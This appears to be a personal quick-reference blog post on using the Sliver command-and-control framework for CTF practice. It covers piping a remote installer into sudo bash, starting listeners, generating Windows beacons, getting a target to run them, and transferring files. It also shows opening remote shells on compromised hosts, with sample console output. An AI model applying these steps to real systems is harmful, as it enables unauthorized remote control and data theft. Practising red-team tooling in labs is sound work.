white and black clouds

Quick Reference Guide: Bishop Fox’s Sliver C2


I’m looking to incorporate more and different tools into my weekly Hack the Box/Proving Grounds practice runs. Recently, I was re-introduced to the Bishop Fox C2 project, called Sliver for the first time in a while, and I’ve really enjoyed getting to know it a little. I’m aiming to use this page as a bit of a quick reference guide for myself and hope to edit it as I discover more useful tricks.

NOTE: this is intended for my use in CTFs/practicing, and is not production or otherwise professionally put together.

Related informative sources




In Kali, it really was just as simple as running their one-liner:

curl https://sliver.sh/install|sudo bash


└─$ sliver
Connecting to localhost:31337 ...

|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
All hackers gain evolve
[*] Server v1.5.30 - a8a36dd6e2c9796c51ab6983b5b615d19c6a6995
[*] Welcome to the sliver shell, please type 'help' for options

Install the armory

This will install all the third party post exploitation scripts.

sliver > armory install all

Start a listener

sliver > https local-ip-address --lhost -D

Generate beacons

This creates an executable that can be launched on the platform of choice.

sliver > generate beacon --http http://local-ip-address --os windows --save local-path-for-executable

Execute beacons

Get the executable file you just created, get it to your target user or host and execute it (or get someone to execute it for you) – you’ll see a call back and a beacon entry show up in the beacons list.

List beacons

sliver > beacons

 ID         Name               Transport   Username   Operating System   Last Check-In   Next Check-In 
========== ================== =========== ========== ================== =============== ===============
 d97fcc0b   UGLIEST_FAMILIAR   http(s)     op1user    linux/amd64        1h12m2s         1h10m47s      
 7fae33ed   UGLIEST_FAMILIAR   http(s)     op1user    linux/amd64        43m42s          42m19s        
 d2355aee   UGLIEST_FAMILIAR   http(s)     op2user    linux/amd64        29m59s          28m50s        
 aedc2bbd   UGLIEST_FAMILIAR   http(s)     op3user      linux/amd64        29m44s          28m34s        
 6f3596af   UGLIEST_FAMILIAR   http(s)     root       linux/amd64        38s             36s

Use beacons

In order to set the current context to a particular beacon, I use the generated ID from the listing above. The prompt will change to contain the name of the selected beacon one it’s set as your active one. You can now issue commands.

sliver > use 6f3596af

[*] Active beacon UGLIEST_FAMILIAR (6f3596af-187d-4b0c-b264-d7482fc6d80b)


Show task list

You can see the status of currently queued and completed tasks issued to a beacon as below:

sliver (UGLIEST_FAMILIAR) > tasks

 ID         State       Message Type   Created                         Sent                            Completed                     
========== =========== ============== =============================== =============================== ===============================
 49ead4a9   completed   Ls             Tue, 18 Oct 2022 23:58:08 EDT   Tue, 18 Oct 2022 23:58:52 EDT   Tue, 18 Oct 2022 23:58:52 EDT

Recall task output

You can re-review the output for a task and get more information about it using fetch and the task’s ID number.

sliver (UGLIEST_FAMILIAR) > tasks fetch 49ead4a9

| Beacon Task   | 49ead4a9-5859-465f-90e1-1c18ffbcdbdc |
| State         | ✅ Completed                         |
| Description   | LsReq                                |
| Created       | Tue, 18 Oct 2022 23:58:08 EDT        |
| Sent          | Tue, 18 Oct 2022 23:58:52 EDT        |
| Completed     | Tue, 18 Oct 2022 23:58:52 EDT        |
| Request Size  | 18 B                                 |
| Response Size | 639 B                                |

/tmp (3 items, 16.1 MiB)
dtrwxrwxrwx  .font-unix                                                                         <dir>      Thu Sep 01 15:33:00 -0400 2022
dtrwxrwxrwx  .ICE-unix                                                                          <dir>      Thu Sep 01 15:33:00 -0400 2022
dtrwxrwxrwx  .Test-unix                                                                         <dir>      Thu Sep 01 15:33:00 -0400 2022

Upload/download a file using beacons

sliver (UGLIEST_FAMILIAR) > upload /path/to/local/file /path/to/remote/destination
[*] Wrote file to /tmp/xxxx.sh

sliver (UGLIEST_FAMILIAR) > download /path/to/remote/source /path/to/local/destination/
[*] Wrote file to /tmp/xxxx.sh

Prepare interactive session

sliver (UGLIEST_FAMILIAR) > interactive

[*] Using beacon's active C2 endpoint: http://x.x.x.x
[*] Tasked beacon UGLIEST_FAMILIAR (5e13a94a)
[*] Session 13b20a10 UGLIEST_FAMILIAR - x.x.x.x:48738 (op1user) - linux/amd64 - Wed, 19 Oct 2022 00:10:05 EDT

List interactive sessions

sliver (UGLIEST_FAMILIAR) > sessions

 ID         Transport   Remote Address         Hostname   Username   Operating System   Health  
========== =========== ====================== ========== ========== ================== =========
 13b20a10   http(s)     x.x.x.x:48738   op1    op1user       linux/amd64        [ALIVE]

Switch to interactive sessions

Using the session ID from above, we will use the familiar from meterpreter/metasploit sessions -i. The prompt will change colors to red once this is complete.

sliver (UGLIEST_FAMILIAR) > sessions -i 13b20a10

[*] Active session UGLIEST_FAMILIAR (13b20a10)


Switch to full shell

Once in an interactive session, you can drop to a full purpose shell.

sliver (UGLIEST_FAMILIAR) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 29576

Scroll to Top